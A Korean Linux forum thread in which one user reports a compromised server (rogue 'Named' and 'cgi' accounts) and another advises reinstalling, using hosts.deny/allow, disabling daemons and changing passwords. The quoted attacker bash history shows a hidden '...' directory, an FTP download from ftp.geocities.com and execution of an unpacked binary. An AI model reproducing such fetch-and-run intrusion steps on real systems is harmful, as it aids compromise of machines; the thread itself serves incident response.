이미 무언가 설치하였다면....
시스템을 다시 설치하시는 것이 좋겠네요.
리눅 다시 셋팅하시자 마자,
일단
/etc/hosts.deny, /etc/hosts.allow 화일을 설정하시고요.
(본인만 접속할 수 있게...)
그리고 여기 저기 보안에 관한 문서들 많잖아요.
그거 보면서 포트 정리나 명령어 정리 하시고요.
쓸데없는 데몬들 다 죽이시고..
가장 중요한 것은 암호를 때때로 바꾸어 주는 것이죠.
그럼 수고하세요.
: 지난번 갑자기 로그인이 되지 않아서 질문을 올렸던 사람 입니다.
:
: 거의 해킹이 확실한것 같아 다시 설치 했습니다.
:
: 설치하고 하루동안 세팅하고 그냥 방치?? 한것이 저의 잘못이라면.....
:
: 오늘 아침 다시보니 누군가 접근한 흔적이 있었습니다.
: 새로운 사용자가 추가 되었구요..
: Named와 cgi라는 id로요...
: uid값도 이상했습니다.
:
: 일단 사용자 계정을 삭제 했습니다.
: Named라는 사용자는 쉘을 쓸수 없게 했더군요..
:
: 아래는 cgi라는 사용자가 썻던 명령어 입니다.
: .bash_history파일에 있던 내용 입니다.
:
: w
: cd ...
: mkdir ...
: cd ...
: ftp ftp.geocities.com
: tar xvf out.tar.gz
: cd out
: ./x 24 30
:
: 위에 ftp서버는 Yahoo에서 운영하는것 같았습니다.
: 뭔가 다운 받아 설치하고 간것 같아요..
:
: 참고로 내임서버가 이상해진것 같습니다.
: 콘솔에 메시지를 뿌려대는것이.... 음...
:
: 도와주세요..
: 보안에 대해서는 아무런 지식이 없어서..
: 다른 로그파일은 없나요?? 있다면 어디에.. 글구 이사람 찾아서 꼭 혼내주고 싶어요..
:
: --
: 안개는 하늘을 사랑합니다. -- 영원히 --
:
: 사랑이 온세상에 퍼지도록...--공유하는 정보가 가치를 창출한다.